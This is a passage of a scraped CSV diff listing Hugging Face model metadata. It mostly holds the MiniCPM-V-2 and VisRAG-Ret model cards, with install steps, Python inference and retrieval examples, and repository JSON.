Providing GGUFs for https://huggingface.co/nvidia/Llama-3_1-Nemotron-Ultra-253B-v1","{""id"": ""Joumdane/Llama-3_1-Nemotron-Ultra-253B-v1"", ""author"": ""Joumdane"", ""sha"": ""10bf4bcaa70110689de7c22089da210df7e0bfe8"", ""last_modified"": ""2025-04-09 20:02:42+00:00"", ""created_at"": ""2025-04-09 20:00:49+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 1, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""gguf-connector"", ""base_model:nvidia/Llama-3_1-Nemotron-Ultra-253B-v1"", ""base_model:finetune:nvidia/Llama-3_1-Nemotron-Ultra-253B-v1"", ""license:other"", ""region:us""], ""pipeline_tag"": null, ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- nvidia/Llama-3_1-Nemotron-Ultra-253B-v1\nlicense: other\nlicense_name: nvidia-open-model-license\nlicense_link: https://www.nvidia.com/en-us/agreements/enterprise-software/nvidia-open-model-license/\ntags:\n- gguf-connector"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-04-09 20:02:42+00:00"", ""cardData"": ""base_model:\n- nvidia/Llama-3_1-Nemotron-Ultra-253B-v1\nlicense: other\nlicense_name: nvidia-open-model-license\nlicense_link: https://www.nvidia.com/en-us/agreements/enterprise-software/nvidia-open-model-license/\ntags:\n- gguf-connector"", ""transformersInfo"": null, ""_id"": ""67f6d1f16af266634d368c4b"", ""modelId"": ""Joumdane/Llama-3_1-Nemotron-Ultra-253B-v1"", ""usedStorage"": 0}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=Joumdane/Llama-3_1-Nemotron-Ultra-253B-v1&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BJoumdane%2FLlama-3_1-Nemotron-Ultra-253B-v1%5D(%2FJoumdane%2FLlama-3_1-Nemotron-Ultra-253B-v1)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
https://huggingface.co/limjh12/llama3.1_Test,N/A,N/A,1,,0,,0,,0,,0,,0
Llama3-8B-Chinese-Chat_finetunes_20250424_223250.csv_finetunes_20250424_223250.csv
ADDED
The diff for this file is too large to render. See raw diff

Llama3-8B-Chinese-Chat_finetunes_20250425_125929.csv_finetunes_20250425_125929.csv
ADDED
The diff for this file is too large to render. See raw diff

MiniCPM-V-2_finetunes_20250425_165642.csv_finetunes_20250425_165642.csv
ADDED
@@ -0,0 +1,390 @@
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
openbmb/MiniCPM-V-2,"---
pipeline_tag: visual-question-answering
language:
- en
- zh
datasets:
- HaoyeZhang/RLHF-V-Dataset
- Yirany/UniMM-Chat
- HuggingFaceM4/VQAv2
- liuhaotian/LLaVA-Instruct-150K
---

[GitHub](https://github.com/OpenBMB/MiniCPM-V) | [Demo](https://huggingface.co/spaces/openbmb/MiniCPM-V-2)

## News <!-- omit in toc -->
* [2025.01.14] 🔥 We open source [**MiniCPM-o 2.6**](https://huggingface.co/openbmb/MiniCPM-o-2_6), with significant performance improvements over **MiniCPM-V 2.6**, and support for real-time speech-to-speech conversation and multimodal live streaming. Try it now.
* [2024.08.06] 🔥 We open-source [**MiniCPM-V 2.6**](https://huggingface.co/openbmb/MiniCPM-V-2_6), which outperforms GPT-4V on single-image, multi-image and video understanding. It advances the popular features of MiniCPM-Llama3-V 2.5, and can support real-time video understanding on iPad.
* [2024.05.20] 🔥 The GPT-4V level multimodal model [**MiniCPM-Llama3-V 2.5**](https://huggingface.co/openbmb/MiniCPM-Llama3-V-2_5) is out.
* [2024.04.23] MiniCPM-V 2.0 supports [vLLM](#vllm) now!
* [2024.04.18] We created a Hugging Face Space to host the demo of MiniCPM-V 2.0 [here](https://huggingface.co/spaces/openbmb/MiniCPM-V-2)!
* [2024.04.17] MiniCPM-V 2.0 supports deploying a [WebUI Demo](https://github.com/OpenBMB/MiniCPM-V/blob/8a1f766b85595a8095651eed9a44a83a965b305b/README_en.md#minicpm-v-) now!
* [2024.04.15] MiniCPM-V 2.0 supports [fine-tuning](https://github.com/modelscope/swift/blob/main/docs/source/Multi-Modal/minicpm-v-2最佳实践.md) with the SWIFT framework!
* [2024.04.12] We open-source MiniCPM-V 2.0, which achieves comparable performance to Gemini Pro in understanding scene text and outperforms the strong Qwen-VL-Chat 9.6B and Yi-VL 34B on <a href=""https://rank.opencompass.org.cn/leaderboard-multimodal"">OpenCompass</a>, a comprehensive evaluation over 11 popular benchmarks. Click <a href=""https://openbmb.vercel.app/minicpm-v-2"">here</a> to view the MiniCPM-V 2.0 technical blog.

## MiniCPM-V 2.0

**MiniCPM-V 2.8B** is a strong multimodal large language model for efficient end-side deployment. The model is built on SigLip-400M and [MiniCPM-2.4B](https://github.com/OpenBMB/MiniCPM/), connected by a perceiver resampler. Our latest version, **MiniCPM-V 2.0**, has several notable features.

- 🔥 **State-of-the-art Performance.**

  MiniCPM-V 2.0 achieves **state-of-the-art performance** on multiple benchmarks (including OCRBench, TextVQA, MME, MMB, MathVista, etc.) among models under 7B parameters. It even **outperforms the strong Qwen-VL-Chat 9.6B, CogVLM-Chat 17.4B, and Yi-VL 34B on OpenCompass, a comprehensive evaluation over 11 popular benchmarks**. Notably, MiniCPM-V 2.0 shows **strong OCR capability**, achieving **comparable performance to Gemini Pro in scene-text understanding** and **state-of-the-art performance on OCRBench** among open-source models.

- 🏆 **Trustworthy Behavior.**

  LMMs are known to suffer from hallucination, often generating text not factually grounded in images. MiniCPM-V 2.0 is **the first end-side LMM aligned via multimodal RLHF for trustworthy behavior** (using the recent [RLHF-V](https://rlhf-v.github.io/) [CVPR'24] series technique). This allows the model to **match GPT-4V in preventing hallucinations** on Object HalBench.

- 🌟 **High-Resolution Images at Any Aspect Ratio.**

  MiniCPM-V 2.0 can accept **1.8 million pixel (e.g., 1344x1344) images at any aspect ratio**. This enables better perception of fine-grained visual information such as small objects and optical characters, achieved via a recent technique from [LLaVA-UHD](https://arxiv.org/pdf/2403.11703.pdf).

- ⚡️ **High Efficiency.**

  MiniCPM-V 2.0 can be **efficiently deployed on most GPU cards and personal computers**, and **even on end devices such as mobile phones**. For visual encoding, we compress the image representations into far fewer tokens via a perceiver resampler. This allows MiniCPM-V 2.0 to operate with **favorable memory cost and speed during inference, even when dealing with high-resolution images**.

- 🙌 **Bilingual Support.**

  MiniCPM-V 2.0 **supports strong bilingual multimodal capabilities in both English and Chinese**. This is enabled by generalizing multimodal capabilities across languages, a technique from [VisCPM](https://arxiv.org/abs/2308.12038) [ICLR'24].

## Evaluation <!-- omit in toc -->

<div align=""center"">
<img src=/openbmb/MiniCPM-V-2.0/resolve/main/assets/minicpmv-2-peformance2.png width=100% />
</div>
Results on TextVQA, DocVQA, OCRBench, OpenCompass, MME, MMBench, MMMU, MathVista, LLaVA Bench, Object HalBench.
<div align=""center"">
<img src=/openbmb/MiniCPM-V-2.0/resolve/main/assets/minicpmv-2-benchmark.png width=140% />
</div>

## Examples <!-- omit in toc -->

<table align=""center"">
  <p align=""center"">
    <img src=""assets/minicpmv2-cases_2.png"" width=95%/>
  </p>
</table>

We deploy MiniCPM-V 2.0 on end devices. The demo video is a raw screen recording on a Xiaomi 14 Pro, without editing.

<table align=""center"">
  <p align=""center"">
    <img src=""assets/station.gif"" width=40% style=""display:inline-block;""/>
    <img src=""assets/london_car.gif"" width=40% style=""display:inline-block;""/>
  </p>
</table>

## Demo
Click here to try out the Demo of [MiniCPM-V 2.0](https://huggingface.co/spaces/openbmb/MiniCPM-V-2).

## Deployment on Mobile Phone
MiniCPM-V 2.0 can be deployed on mobile phones with Android and Harmony operating systems. 🚀 Try it out [here](https://github.com/OpenBMB/mlc-MiniCPM).

## Inference with vLLM<a id=""vllm""></a>

<details>
<summary>Click to see how to run inference with vLLM</summary>
Because our pull request to vLLM is still under review, we forked the repository to build and test our vLLM demo. Here are the steps:

1. Clone our version of vLLM:
```shell
git clone https://github.com/OpenBMB/vllm.git
```
2. Install vLLM:
```shell
cd vllm
pip install -e .
```
3. Install timm:
```shell
pip install timm==0.9.10
```
4. Run our demo:
```shell
python examples/minicpmv_example.py
```
</details>

## Usage
Inference using Hugging Face transformers on NVIDIA GPUs or a Mac with MPS (Apple silicon or AMD GPUs). Requirements tested on Python 3.10:
```
Pillow==10.1.0
timm==0.9.10
torch==2.1.2
torchvision==0.16.2
transformers==4.36.0
sentencepiece==0.1.99
```

```python
# test.py
import torch
from PIL import Image
from transformers import AutoModel, AutoTokenizer

model = AutoModel.from_pretrained('openbmb/MiniCPM-V-2', trust_remote_code=True, torch_dtype=torch.bfloat16)
# For NVIDIA GPUs that support BF16 (like A100, H100, RTX3090)
model = model.to(device='cuda', dtype=torch.bfloat16)
# For NVIDIA GPUs that do NOT support BF16 (like V100, T4, RTX2080)
#model = model.to(device='cuda', dtype=torch.float16)
# For a Mac with MPS (Apple silicon or AMD GPUs),
# run with `PYTORCH_ENABLE_MPS_FALLBACK=1 python test.py`
#model = model.to(device='mps', dtype=torch.float16)

tokenizer = AutoTokenizer.from_pretrained('openbmb/MiniCPM-V-2', trust_remote_code=True)
model.eval()

image = Image.open('xx.jpg').convert('RGB')
question = 'What is in the image?'
msgs = [{'role': 'user', 'content': question}]

res, context, _ = model.chat(
    image=image,
    msgs=msgs,
    context=None,
    tokenizer=tokenizer,
    sampling=True,
    temperature=0.7
)
print(res)
```
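
For a multi-turn conversation, a common pattern in the MiniCPM-V examples is to append the previous answer to `msgs` and ask a follow-up. A hedged sketch continuing the script above (the follow-up question is illustrative, and the exact multi-turn contract of `model.chat` should be checked against the GitHub examples):

```python
# Hypothetical second turn: reuse the message history from the first call above.
msgs.append({'role': 'assistant', 'content': res})
msgs.append({'role': 'user', 'content': 'What color is it?'})

res, context, _ = model.chat(
    image=image,
    msgs=msgs,
    context=None,
    tokenizer=tokenizer,
    sampling=True,
    temperature=0.7
)
print(res)
```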

Please look at [GitHub](https://github.com/OpenBMB/MiniCPM-V) for more details about usage.


## MiniCPM-V 1.0 <!-- omit in toc -->
Please see the info about MiniCPM-V 1.0 [here](https://huggingface.co/openbmb/MiniCPM-V).

## License
#### Model License
* The code in this repo is released under the [Apache-2.0](https://github.com/OpenBMB/MiniCPM/blob/main/LICENSE) License.
* The usage of MiniCPM-V series model weights must strictly follow the [MiniCPM Model License.md](https://github.com/OpenBMB/MiniCPM/blob/main/MiniCPM%20Model%20License.md).
* The models and weights of MiniCPM are completely free for academic research. After filling out a [""questionnaire""](https://modelbest.feishu.cn/share/base/form/shrcnpV5ZT9EJ6xYjh3Kx0J6v8g) for registration, they are also available for free commercial use.


#### Statement
* As an LLM, MiniCPM-V 2.0 generates content by learning from a large amount of text, but it cannot comprehend or express personal opinions or make value judgments. Anything generated by MiniCPM-V 2.0 does not represent the views and positions of the model developers.
* We will not be liable for any problems arising from the use of the MiniCPM-V open-source model, including but not limited to data security issues, risks of public opinion, or any risks and problems arising from the misdirection, misuse, or dissemination of the model.

## Other Multimodal Projects from Our Team

[VisCPM](https://github.com/OpenBMB/VisCPM/tree/main) | [RLHF-V](https://github.com/RLHF-V/RLHF-V) | [LLaVA-UHD](https://github.com/thunlp/LLaVA-UHD)

## Citation

If you find our work helpful, please consider citing the following papers:

```bib
@article{yu2023rlhf,
  title={Rlhf-v: Towards trustworthy mllms via behavior alignment from fine-grained correctional human feedback},
  author={Yu, Tianyu and Yao, Yuan and Zhang, Haoye and He, Taiwen and Han, Yifeng and Cui, Ganqu and Hu, Jinyi and Liu, Zhiyuan and Zheng, Hai-Tao and Sun, Maosong and others},
  journal={arXiv preprint arXiv:2312.00849},
  year={2023}
}
@article{viscpm,
  title={Large Multilingual Models Pivot Zero-Shot Multimodal Learning across Languages},
  author={Jinyi Hu and Yuan Yao and Chongyi Wang and Shan Wang and Yinxu Pan and Qianyu Chen and Tianyu Yu and Hanghao Wu and Yue Zhao and Haoye Zhang and Xu Han and Yankai Lin and Jiao Xue and Dahai Li and Zhiyuan Liu and Maosong Sun},
  journal={arXiv preprint arXiv:2308.12038},
  year={2023}
}
@article{xu2024llava-uhd,
  title={{LLaVA-UHD}: an LMM Perceiving Any Aspect Ratio and High-Resolution Images},
  author={Xu, Ruyi and Yao, Yuan and Guo, Zonghao and Cui, Junbo and Ni, Zanlin and Ge, Chunjiang and Chua, Tat-Seng and Liu, Zhiyuan and Huang, Gao},
  journal={arXiv preprint arXiv:2403.11703},
  year={2024}
}
@article{yao2024minicpmvgpt4vlevelmllm,
  title={MiniCPM-V: A GPT-4V Level MLLM on Your Phone},
  author={Yao, Yuan and Yu, Tianyu and Zhang, Ao and Wang, Chongyi and Cui, Junbo and Zhu, Hongji and Cai, Tianchi and Li, Haoyu and Zhao, Weilin and He, Zhihui and Chen, Qianyu and Zhou, Huarong and Zou, Zhensheng and Zhang, Haoye and Hu, Shengding and Zheng, Zhi and Zhou, Jie and Cai, Jie and Han, Xu and Zeng, Guoyang and Li, Dahai and Liu, Zhiyuan and Sun, Maosong},
  journal={arXiv preprint arXiv:2408.01800},
  year={2024},
  url={https://arxiv.org/abs/2408.01800},
}
```","{""id"": ""openbmb/MiniCPM-V-2"", ""author"": ""openbmb"", ""sha"": ""b9a02dbfcc87e471b13f8d1c6963747db31427db"", ""last_modified"": ""2025-01-15 10:35:33+00:00"", ""created_at"": ""2024-04-09 11:20:33+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 10386, ""downloads_all_time"": null, ""likes"": 461, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""safetensors"", ""minicpmv"", ""feature-extraction"", ""visual-question-answering"", ""custom_code"", ""en"", ""zh"", ""dataset:HaoyeZhang/RLHF-V-Dataset"", ""dataset:Yirany/UniMM-Chat"", ""dataset:HuggingFaceM4/VQAv2"", ""dataset:liuhaotian/LLaVA-Instruct-150K"", ""arxiv:2403.11703"", ""arxiv:2308.12038"", ""arxiv:2312.00849"", ""arxiv:2408.01800"", ""region:us""], ""pipeline_tag"": ""visual-question-answering"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""datasets:\n- HaoyeZhang/RLHF-V-Dataset\n- Yirany/UniMM-Chat\n- HuggingFaceM4/VQAv2\n- liuhaotian/LLaVA-Instruct-150K\nlanguage:\n- en\n- zh\npipeline_tag: visual-question-answering"", ""widget_data"": null, ""model_index"": null, ""config"": {""architectures"": [""MiniCPMV""], ""auto_map"": {""AutoConfig"": ""configuration_minicpm.MiniCPMVConfig"", ""AutoModel"": ""modeling_minicpmv.MiniCPMV"", ""AutoModelForCausalLM"": ""modeling_minicpmv.MiniCPMV""}, ""model_type"": ""minicpmv"", ""tokenizer_config"": {""bos_token"": ""<s>"", ""eos_token"": ""</s>"", ""pad_token"": ""<unk>"", ""unk_token"": ""<unk>"", ""use_default_system_prompt"": false}}, ""transformers_info"": {""auto_model"": ""AutoModel"", ""custom_class"": ""modeling_minicpmv.MiniCPMV"", ""pipeline_tag"": ""feature-extraction"", ""processor"": null}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='assets/english_menu.gif', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='assets/london_car.gif', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='assets/minicpmv-2-benchmark.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='assets/minicpmv-2-peformance2.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='assets/minicpmv2-cases_2.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='assets/station.gif', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='configuration_minicpm.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00001-of-00002.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00002-of-00002.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='modeling_minicpm.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='modeling_minicpmv.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='resampler.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.model', size=None, blob_id=None, lfs=None)"", 
""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [""bokesyo/MiniCPM_Visual_Document_Retriever_Demo"", ""ashika00/Farmers-Hub"", ""Demo750/XGBoost_Gaze"", ""Mister56/VQA_app"", ""darkstar94/MiniCPM-V-2"", ""AhmedAlmaghz/github-repo-test"", ""VanguardAI/MultiModal_OpenSource_AI"", ""Faustrix/SodokuSolver"", ""yehtutmaung/Story_and_Music_Generator_from_Image""], ""safetensors"": {""parameters"": {""BF16"": 3434965792}, ""total"": 3434965792}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-01-15 10:35:33+00:00"", ""cardData"": ""datasets:\n- HaoyeZhang/RLHF-V-Dataset\n- Yirany/UniMM-Chat\n- HuggingFaceM4/VQAv2\n- liuhaotian/LLaVA-Instruct-150K\nlanguage:\n- en\n- zh\npipeline_tag: visual-question-answering"", ""transformersInfo"": {""auto_model"": ""AutoModel"", ""custom_class"": ""modeling_minicpmv.MiniCPMV"", ""pipeline_tag"": ""feature-extraction"", ""processor"": null}, ""_id"": ""661524817880b7466a45276c"", ""modelId"": ""openbmb/MiniCPM-V-2"", ""usedStorage"": 6919753277}",0,https://huggingface.co/openbmb/VisRAG-Ret,1,,0,,0,,0,"AhmedAlmaghz/github-repo-test, Demo750/XGBoost_Gaze, Faustrix/SodokuSolver, Mister56/VQA_app, VanguardAI/MultiModal_OpenSource_AI, ashika00/Farmers-Hub, bokesyo/MiniCPM_Visual_Document_Retriever_Demo, darkstar94/MiniCPM-V-2, huggingface/InferenceSupport/discussions/new?title=openbmb/MiniCPM-V-2&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bopenbmb%2FMiniCPM-V-2%5D(%2Fopenbmb%2FMiniCPM-V-2)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A, openbmb/MiniCPM-V-2, yehtutmaung/Story_and_Music_Generator_from_Image",11
openbmb/VisRAG-Ret,"---
license: apache-2.0
datasets:
- openbmb/VisRAG-Ret-Train-In-domain-data
- openbmb/VisRAG-Ret-Train-Synthetic-data
language:
- en
base_model:
- openbmb/MiniCPM-V-2
tags:
- VisRAG
pipeline_tag: feature-extraction
---
# VisRAG: Vision-based Retrieval-augmented Generation on Multi-modality Documents
<div style=""display: flex; align-items: center;"">
  <a href=""https://huggingface.co/openbmb/VisRAG-Ret"" style=""margin-right: 10px;"">
    <img src=""https://img.shields.io/badge/VisRAG_Ret-fcd022?style=for-the-badge&logo=huggingface&logoColor=000"" alt=""VisRAG Ret"">
  </a>
  <a href=""https://huggingface.co/collections/openbmb/visrag-6717bbfb471bb018a49f1c69"" style=""margin-right: 10px;"">
    <img src=""https://img.shields.io/badge/VisRAG_Collection-fcd022?style=for-the-badge&logo=huggingface&logoColor=000"" alt=""VisRAG Collection"">
  </a>
  <a href=""https://huggingface.co/spaces/tcy6/VisRAG_Pipeline"" style=""margin-right: 10px;"">
    <img src=""https://img.shields.io/badge/VisRAG_Pipeline-fcd022?style=for-the-badge&logo=huggingface&logoColor=000"" alt=""VisRAG Pipeline"">
  </a>
  <a href=""https://arxiv.org/abs/2410.10594"" style=""margin-right: 10px;"">
    <img src=""https://img.shields.io/badge/arXiv-2410.10594-ff0000.svg?style=for-the-badge"" alt=""arXiv"">
  </a>
  <a href=""https://colab.research.google.com/drive/11KV9adDNXPfHiuFAfXNOvtYJKcyR8JZH?usp=sharing"" style=""margin-right: 10px;"">
    <img src=""https://img.shields.io/badge/VisRAG_Pipeline-ffffff?style=for-the-badge&logo=googlecolab&logoColor=f9ab00"" alt=""Google Colab"">
  </a>
  <a href=""https://github.com/openbmb/VisRAG"" style=""margin-right: 10px;"">
    <img src=""https://img.shields.io/badge/VisRAG-000000?style=for-the-badge&logo=github&logoColor=white"" alt=""GitHub"">
  </a>
</div>

<p align=""center"">•
  <a href=""#📖-introduction""> 📖 Introduction </a> •
  <a href=""#🎉-news"">🎉 News</a> •
  <a href=""#✨-visrag-pipeline"">✨ VisRAG Pipeline</a> •
  <a href=""#⚡️-training"">⚡️ Training</a>
</p>
<p align=""center"">•
  <a href=""#📦-requirements"">📦 Requirements</a> •
  <a href=""#🔧-usage"">🔧 Usage</a> •
  <a href=""#📄-license"">📄 License</a> •
  <a href=""#📑-citation"">📑 Citation</a> •
  <a href=""#📧-contact"">📧 Contact</a>
</p>

# 📖 Introduction
**VisRAG** is a novel vision-language model (VLM)-based RAG pipeline. In this pipeline, instead of first parsing the document to obtain text, the document is directly embedded as an image by a VLM and then retrieved to enhance the generation of a VLM. Compared to traditional text-based RAG, **VisRAG** maximizes the retention and utilization of the information in the original documents, eliminating the information loss introduced during the parsing process.
<p align=""center""><img width=800 src=""https://github.com/openbmb/VisRAG/blob/master/assets/main_figure.png?raw=true""/></p>

# 🎉 News

* 20241104: Released our [VisRAG Pipeline](https://huggingface.co/spaces/tcy6/VisRAG_Pipeline) on Hugging Face Spaces.
* 20241031: Released our [VisRAG Pipeline](https://colab.research.google.com/drive/11KV9adDNXPfHiuFAfXNOvtYJKcyR8JZH?usp=sharing) on Colab.
* 20241015: Released our train data and test data on Hugging Face, which can be found in the [VisRAG](https://huggingface.co/collections/openbmb/visrag-6717bbfb471bb018a49f1c69) Collection on Hugging Face. It is referenced at the beginning of this page.
* 20241014: Released our [Paper](https://arxiv.org/abs/2410.10594) on arXiv. Released our [Model](https://huggingface.co/openbmb/VisRAG-Ret) on Hugging Face. Released our [Code](https://github.com/OpenBMB/VisRAG) on GitHub.

# ✨ VisRAG Pipeline

## VisRAG-Ret
**VisRAG-Ret** is a document embedding model built on [MiniCPM-V 2.0](https://huggingface.co/openbmb/MiniCPM-V-2), a vision-language model that integrates [SigLIP](https://huggingface.co/google/siglip-so400m-patch14-384) as the vision encoder and [MiniCPM-2B](https://huggingface.co/openbmb/MiniCPM-2B-sft-bf16) as the language model.

## VisRAG-Gen
In the paper, we use MiniCPM-V 2.0, MiniCPM-V 2.6 and GPT-4o as the generators. In practice, you can use any VLM you like!

# ⚡️ Training

## VisRAG-Ret
Our training dataset of 362,110 Query-Document (Q-D) pairs for **VisRAG-Ret** comprises the train sets of openly available academic datasets (34%) and a synthetic dataset of pages from web-crawled PDF documents, augmented with VLM-generated (GPT-4o) pseudo-queries (66%). It can be found in the `VisRAG` Collection on Hugging Face, referenced at the beginning of this page.


## VisRAG-Gen
The generation part does not use any fine-tuning; we directly use off-the-shelf LLMs/VLMs for generation.

# 📦 Requirements
```
torch==2.1.2
torchvision==0.16.2
transformers==4.40.2
sentencepiece==0.1.99
decord==0.6.0
Pillow==10.1.0
```

# 🔧 Usage

## VisRAG-Ret
```python
from transformers import AutoModel, AutoTokenizer
import torch
import torch.nn.functional as F
from PIL import Image
import requests
from io import BytesIO

def weighted_mean_pooling(hidden, attention_mask):
    # Position-weighted mean pooling: token i is weighted by its 1-based position,
    # so later tokens contribute more to the sequence embedding.
    attention_mask_ = attention_mask * attention_mask.cumsum(dim=1)
    s = torch.sum(hidden * attention_mask_.unsqueeze(-1).float(), dim=1)
    d = attention_mask_.sum(dim=1, keepdim=True).float()
    reps = s / d
    return reps

@torch.no_grad()
def encode(text_or_image_list):
    # The model embeds either a batch of query strings or a batch of page images.
    if isinstance(text_or_image_list[0], str):
        inputs = {
            ""text"": text_or_image_list,
            'image': [None] * len(text_or_image_list),
            'tokenizer': tokenizer
        }
    else:
        inputs = {
            ""text"": [''] * len(text_or_image_list),
            'image': text_or_image_list,
            'tokenizer': tokenizer
        }
    outputs = model(**inputs)
    attention_mask = outputs.attention_mask
    hidden = outputs.last_hidden_state

    reps = weighted_mean_pooling(hidden, attention_mask)
    embeddings = F.normalize(reps, p=2, dim=1).detach().cpu().numpy()
    return embeddings

model_name_or_path = ""openbmb/VisRAG-Ret""
tokenizer = AutoTokenizer.from_pretrained(model_name_or_path, trust_remote_code=True)
model = AutoModel.from_pretrained(model_name_or_path, torch_dtype=torch.bfloat16, trust_remote_code=True).cuda()
model.eval()

queries = [""What does a dog look like?""]
INSTRUCTION = ""Represent this query for retrieving relevant documents: ""
queries = [INSTRUCTION + query for query in queries]

print(""Downloading images..."")
passages = [
    Image.open(BytesIO(requests.get(
        'https://github.com/OpenBMB/VisRAG/raw/refs/heads/master/scripts/demo/retriever/test_image/cat.jpeg'
    ).content)).convert('RGB'),
    Image.open(BytesIO(requests.get(
        'https://github.com/OpenBMB/VisRAG/raw/refs/heads/master/scripts/demo/retriever/test_image/dog.jpg'
    ).content)).convert('RGB')
]
print(""Images downloaded."")

embeddings_query = encode(queries)
embeddings_doc = encode(passages)

scores = (embeddings_query @ embeddings_doc.T)
print(scores.tolist())
```
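
The similarity matrix above already contains everything needed for retrieval. As a small illustrative extension (not part of the original script), the best-matching page per query can be selected with `numpy`:

```python
import numpy as np

# scores has shape (num_queries, num_passages); higher cosine similarity = better match.
ranked = np.argsort(-np.asarray(scores), axis=1)
top_k = 1
for qi, doc_ids in enumerate(ranked[:, :top_k]):
    print(f""query {qi} -> best passage index {doc_ids.tolist()}"")
```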

# 📄 License

* The code in this repo is released under the [Apache-2.0](https://github.com/OpenBMB/MiniCPM/blob/main/LICENSE) License.
* The usage of **VisRAG-Ret** model weights must strictly follow the [MiniCPM Model License.md](https://github.com/OpenBMB/MiniCPM/blob/main/MiniCPM%20Model%20License.md).
* The models and weights of **VisRAG-Ret** are completely free for academic research. After filling out a [""questionnaire""](https://modelbest.feishu.cn/share/base/form/shrcnpV5ZT9EJ6xYjh3Kx0J6v8g) for registration, **VisRAG-Ret** weights are also available for free commercial use.

# 📑 Citation

```
@misc{yu2024visragvisionbasedretrievalaugmentedgeneration,
  title={VisRAG: Vision-based Retrieval-augmented Generation on Multi-modality Documents},
  author={Shi Yu and Chaoyue Tang and Bokai Xu and Junbo Cui and Junhao Ran and Yukun Yan and Zhenghao Liu and Shuo Wang and Xu Han and Zhiyuan Liu and Maosong Sun},
  year={2024},
  eprint={2410.10594},
  archivePrefix={arXiv},
  primaryClass={cs.IR},
  url={https://arxiv.org/abs/2410.10594},
}
```

# 📧 Contact

- Shi Yu: yus21@mails.tsinghua.edu.cn
- Chaoyue Tang: tcy006@gmail.com","{""id"": ""openbmb/VisRAG-Ret"", ""author"": ""openbmb"", ""sha"": ""95ef596df871b606167cb7e4b7215caf1bfdf761"", ""last_modified"": ""2024-11-04 13:12:45+00:00"", ""created_at"": ""2024-10-14 18:36:55+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 1433, ""downloads_all_time"": null, ""likes"": 65, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""safetensors"", ""minicpmv"", ""VisRAG"", ""feature-extraction"", ""custom_code"", ""en"", ""dataset:openbmb/VisRAG-Ret-Train-In-domain-data"", ""dataset:openbmb/VisRAG-Ret-Train-Synthetic-data"", ""arxiv:2410.10594"", ""base_model:openbmb/MiniCPM-V-2"", ""base_model:finetune:openbmb/MiniCPM-V-2"", ""license:apache-2.0"", ""region:us""], ""pipeline_tag"": ""feature-extraction"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- openbmb/MiniCPM-V-2\ndatasets:\n- openbmb/VisRAG-Ret-Train-In-domain-data\n- openbmb/VisRAG-Ret-Train-Synthetic-data\nlanguage:\n- en\nlicense: apache-2.0\npipeline_tag: feature-extraction\ntags:\n- VisRAG"", ""widget_data"": null, ""model_index"": null, ""config"": {""architectures"": [""VisRAG_Ret""], ""auto_map"": {""AutoConfig"": ""configuration_minicpm.MiniCPMVConfig"", ""AutoModel"": ""modeling_visrag_ret.VisRAG_Ret""}, ""model_type"": ""minicpmv"", ""tokenizer_config"": {""bos_token"": ""<s>"", ""eos_token"": ""</s>"", ""pad_token"": ""<unk>"", ""unk_token"": ""<unk>"", ""use_default_system_prompt"": false}}, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='configuration_minicpm.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00001-of-00002.safetensors', size=None, blob_id=None, 